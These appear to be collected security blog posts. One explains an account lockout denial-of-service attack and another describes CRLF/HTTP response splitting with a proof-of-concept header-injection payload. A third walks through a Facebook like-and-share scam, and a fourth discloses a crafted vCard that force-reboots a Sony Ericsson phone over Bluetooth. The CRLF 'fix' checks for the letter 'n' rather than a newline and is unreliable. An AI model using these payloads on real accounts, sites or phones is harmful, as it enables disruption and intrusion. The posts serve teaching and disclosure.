Account lockout: Security or Vulnerability
ShareIntroduction:
First of all, “Account Lockout” is a security mechanism. It is also a subroutine. This mechanism uses on web application to Electronic gate-pass.
Account lockout is a good way to reduce risk. If a person makes an attempt with a bad password, after a certain number of bad attempts the account will get locked out. Many systems can unlock the account out after a certain amount of time.
Attack:
The account lockout attack is an attack on the client, not the server. It causes the victim’s account to be locked and unable to access it for a period of time causing disruption and if used at the right time can prove very effective. In an account lockout attack, the attacker attempts to lockout all user accounts, typically by failing login more times than the threshold defined by the authentication system. For example, if users are locked out of their accounts after three failed login attempts, an attacker can lock out their account for them simply by failing login three times. This attack can result in a large scale denial of service attack if all user accounts are locked out, especially if the amount of work required to reset the accounts is significant.
Who is the Target?
Sites that operate an account lockout feature depending on incorrect logins in a certain period of time are vulnerable. Note this only works when the system locks the username not the attempting IP address. As otherwise all you are doing is blocking your self out. Sites employ this lockout feature to prevent bruteforce attacks on passwords, an even more severe attack.
Methods of Attack:
- API Abuse
- Flooding
- Brute Force
Ways of Attack:
- First one, Hacker will submit wrong password to system according to targeted username until that account get locked.
- Second one, by editing the cookie, hacker will attempt one login, then find the cookie “logins_incorrect=1″ or similar, and change the value to 999, or any number above the limit. This data will then be sent back to the server and stored in the database so the user will be locked out everywhere.
- Third one, hacker could write a script to simultaneously lockout every username in the database, of course here he will need a username list but most forums and CMS’s have the memberlist ready to copy. This is most disruptive when performed at the company’s busiest times such as New-Year.
Procedure of a successful attack:
# First Phase:
- Analyze system documentation to find list of events that could potentially cause account lockout
- Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
- Determine another user’s login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times or until the system provides an indication that the account is locked out.
#Second Phase:
- Obtain list of authorized users using another attack pattern, such as SQL Injection.
- Attempt to create accounts if possible; system should indicate if a user ID is already taken.
- Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.
#Third Phase:
- For each user ID to be locked out, perform the lockout procedure discovered in the first step.
Solutions:
- Do not provide any indication to users that their accounts are locked out. Provide a simple error message such as: “Login failed. Try again or contact your administrator” regardless of why a login attempt fails.
- Avoid providing any indication regarding the validity of user IDs upon failed login attempts. Provide a simple error message such as: “Login failed. Try again or contact your administrator” regardless of why a login attempt fails.
- Build authentication mechanism, which will block account after N tries for a given IP address, from which log in attempt was conducted.
- To minimize possibility of blocking owner`s account we may take under consideration other characteristics like User-Agent or X_FORWARDED_FOR (if it’s present).
- Moreover after N login attempts, but before blocking the account, you may include additional verification by comparing data entered by the user and data displayed to him/her on the picture (CAPTCHA).
Conclusion:
- Needed Hacking skill or knowledge: Low
- Risk of successful attack: High
- Result of attack: Denial of Service
CRLF or HTTPRS: Carriage Return and Line Feed/ HTTP Response Splitting.
Share##Introduction:
After a long time, I am writing about a new thing, new thing cause I’ve learned it last night. Visited couple of sites from last night, and wondering that how I was in dark about “Carriage Return and Line Feedâ€.
##Description:
CRLF injection attacks are not as well known as some other attacks, but when used against vulnerable applications, CRLF injections can be just as effective and devastating .It is fairly simple, yet extremely powerful web attack.  Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks.  A number of years ago a number of CRLF injection vulnerabilities were also discovered in Google’s Adwords web interface.
Link: Â www.hackingspirits.com/vuln-rnd/adwords-crlf-injection.pdf
CRLF Â is a very significant sequence of characters for programmers. These two special characters represent the End Of Line (EOL) marker for many Internet protocols, including, but not limited to MIME (e-mail), NNTP (newsgroups) and more importantly HTTP. Â When programmers write code for web applications they split headers based on where the CRLF is found. If a malicious user is able to inject his own CRLF sequence into an HTTP stream, he is able to maliciously control the way a web application functions.
The essence of HTTP Response splitting is the attacker's ability to send a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response, in the normal case. The first response may be partially controlled by the attacker, but this is less important. What is material is that the attacker completely controls the form of the second response from the HTTP status line to the last byte of the HTTP response body. Once this is possible, the attacker realizes the attack by sending two requests through the target. The first one invokes two responses from the web server, and the second request would typically be to some "innocent" resource on the web server. However, the second request would be matched, by the target, to the second HTTP response, which is fully controlled by the attacker. The attacker, therefore, tricks the target into believing that a particular resource on the web server (designated by the second request) is the server's HTTP response (server content), while it is in fact some data, which is forged by the attacker through the web server - this is the second response.
HTTP Response Splitting attacks take place where the server script embeds user data in HTTP response headers. This typically happens when the script embeds user data in the redirection URL of a redirection response (HTTP status code 3xx), or when the script embeds user data in a cookie value or name when the response sets a cookie.
In the first case, the redirection URL is part of the Location HTTP response header, and in the second cookie setting case, the cookie name/value is part of the Set-Cookie HTTP response header.
The essence of the attack is injecting CRs and LFs in such manner that a second HTTP message is formed where a single one was planned for by the application. CRLF injection is a method used for several other attacks which change the data of the single HTTP response send by the application, but in this case, the role of the CRLFs is slightly different - it is meant to terminate the first (planned) HTTP response message, and form another (totally crafted by the attacked, and totally unplanned by the application) HTTP response message (hence the name of the attack). This injection is possible if the application (that runs on top of the web server) embeds un-validated user data in a redirection, cookie setting, or any other manner that eventually causes user data to become part of the HTTP response headers.
With HTTP Response Splitting, it is possible to mount various kinds of attacks:
#Cross-User Defacement
An attacker can make a single request to a vulnerable server that will cause the sever to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever. This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.
In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application.
In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker.
#Cache Poisoning
The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected.
#Cross-Site Scripting
Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users. Cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user's browser.
The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.
The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim's account.
#Page Hijacking
In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead. By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker.
Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker's request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker's request is already waiting and is interpreted as a response to the victim's request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim.
##Proof-Of-Concept:
Header Injection:
Vulnerable document is “rdt.phpâ€
Injected Header Data:
</p> <p>%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont color=red%3Ehey%3C/font%3E%3C/html%3E</p> <p>
If the user follows the link, the HTTP request will look like:
</p> <p>GET /rdt.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont color=red%3Ehey%3C/font%3E%3C/html%3E HTTP/1.1\r\n</p> <p>Host: abc.org\r\n</p> <p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\r\n</p> <p>Accept: text/xml,application/xml,application/xhtml xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n</p> <p>Accept-Language: en-us,en;q=0.5\r\n</p> <p>Accept-Encoding: gzip,deflate\r\n</p> <p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n</p> <p>Keep-Alive: 300\r\n</p> <p>Connection: keep-alive\r\n</p> <p>\r\n</p> <p>
##Fix:
The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to “$_POST['input']â€
</p>
<p>if (eregi('n', $_POST['input'])) //This checks for the new line character in the POST variable</p>
<p>{ //start if..</p>
<p>die("CRLF Attack Detected"); //exit program if CRLF is found in the variable</p>
<p>} //end if..</p>
<p>
##Conclusion:
“Carriage Return and Line Feed†will be famous Attack Method for next generation. Because it not well-known to people. Everybody keeps eyes on SQLi or on XSS. But in upcoming times, it will hard to find a SQLi/XSS vulnerable site or Web-app.
## References:
**Web Sites
**Books
**Blogs
FACEBOOK SPAM: Hidden Message in the Google Logo!
Share-
And once again, FB users are  helping FACEBOOK SPAMMERS without knowing themselves. A lot of  SHOCKING  information are posting on facebook news feed. Some days ago there was a hoax/spam called “Girl who killed herselfâ€.
You may visit this link to get full information.
Today, I saw a post on my news feed about “SHOCKING Hidden Message in the Google Logo! You won’t believe this!â€. It was lame but we all love to know THE SECRETs. Curiosity is a dangerous thing; it grows and gives mental pain. So, we need to satisfy ourselves anyhow. And make us a SPAM VICTIM.
Spam is the use of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. While the most widely recognized form of spam is e-mail spam, the term is applied to similar abuses in other media: instant messaging spam, Usenet newsgroup spam, Web search engine spam, spam in blogs, wiki spam, online classified ads spam, mobile phone messaging spam, Internet forum spam, junk fax transmissions, social networking spam, television advertising and file sharing network spam.
Spamming remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, and it is difficult to hold senders accountable for their mass mailings. Because the barrier to entry is so low, spammers are numerous, and the volume of unsolicited mail has become very high. The costs, such as lost productivity and fraud, are borne by the public and by Internet service providers, which have been forced to add extra capacity to cope with the deluge. Spamming is universally reviled, and has been the subject of legislation in many jurisdictions.
People who create electronic spam are called spammers.
Now I am going to demonstrate, what will happen after following that FB post.
Very intelligent page that uses familiar scam where they trick you into “liking” and “sharing” the link.
After clicking that LIKE button.
Now you have to share this page on your FB profile.
AND
Now visit your profile.
Back to page, HUH!! Survey….GOD, here is the trick.
Now reveal that google secret.[ 
]
Truth about GOOGLE LOGO SECRET is here.
Stop “liking” and “sharing” pages unless you really do like them. There are many scammers on Facebook trying to trick you into sharing their links with the promise of showing you some exclusive pictures or a video or secrets.
DoS: Sony Ericsson Phone memory Contact.
SharePen-tested Subject: Sony Ericsson Phone Contact.
Discovery Date: 19/03/2010.
Exploit Date: 10/04/2010.
Test Object: Sony Ericsson W580i.
Used Tools: BlueTooth, MyPhoneExplorer and Textpad.
Vulnerability: Denial of Service.
Result : Automatic Force Reboot.
Greetings : FaceBook!! Yaa FaceBook!!
Note: None.
0×01: Introduction:
My younger brother suddenly informed me that, his phone got a problem. It takes Reboot when he wants to call a contact. He also said: “I was working with Digital V-Cardsâ€.
0×02: Description:
**Normal V-Card that saves at SE phone contact.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8:;Unknown FN;CHARSET=UTF-8:Unknown TEL;CELL:+8801111112222 X-IRMC-LUID:00020000009A END:VCARD
Take a close look at V-Card, there is a character set encoding system (UTF-8) at N (Name) and FN (Family Name).
Why that character encoding used there? Cause SE supports many types of special symbols to write contact name on phone memory. Also it is a multilingual handset.
UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. It is able to represent any character in the Unicode standard, yet is backwards compatible with ASCII. For these reasons, it is steadily becoming the preferred encoding for e-mail, web pages, and other places where characters are stored or streamed.
UTF-8 encodes each character (code point) in 1 to 4 octets (8-bit bytes), with the single–octet encoding used only for the 128 US-ASCII characters.
0×03 Ideas:
1. Let use some special symbols in Contact name (V-Card).
2. Why not, we can set encoded data in CELL number (V-Card).
3. Hopefully SE developers never thought that user can set their V-Card Manually. And hopefully their decoding mechanism does not prepare to decode the CELL numbers.
0×04: Ideas execution:
Let see another V-Card that uses special symbols.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Unknown...=C2=A3 FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown...=C2=A3 TEL;CELL: +8801111112222 X-IRMC-LUID:000200000001 END:VCARD
It works perfectly.
0×05: Exploit:
Successfully exploited V-Card.
BEGIN:VCARD VERSION:2.1 N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:V=01;Unknown FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown V=01 TEL;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:0000000000000000000000000000000= 0000000000000000000000000000000000000000000000000=EB=BA=BA X-IRMC-LUID:00020000001F END:VCARD
0×06: Attack Method:
1. Save this exploited V-Card.
2. Send this V-Card to targeted phone via Bluetooth from your computer or phone.
0×07: Effect:
Phone will take force reboot if victim want to DELETE, EDIT, CALL and VIEW that V-Card.
0×08: References:
1. The WiKipedia
2. SE Manual.
0×09: Credits:
a. Shakil Mirza.
b. Shahee Mirza.
0×10: Conclusion:
I think there is a vulnerability on Sony Ericsson handset’s Bluetooth. Multi-request and too much DATA flow may causes DoS.
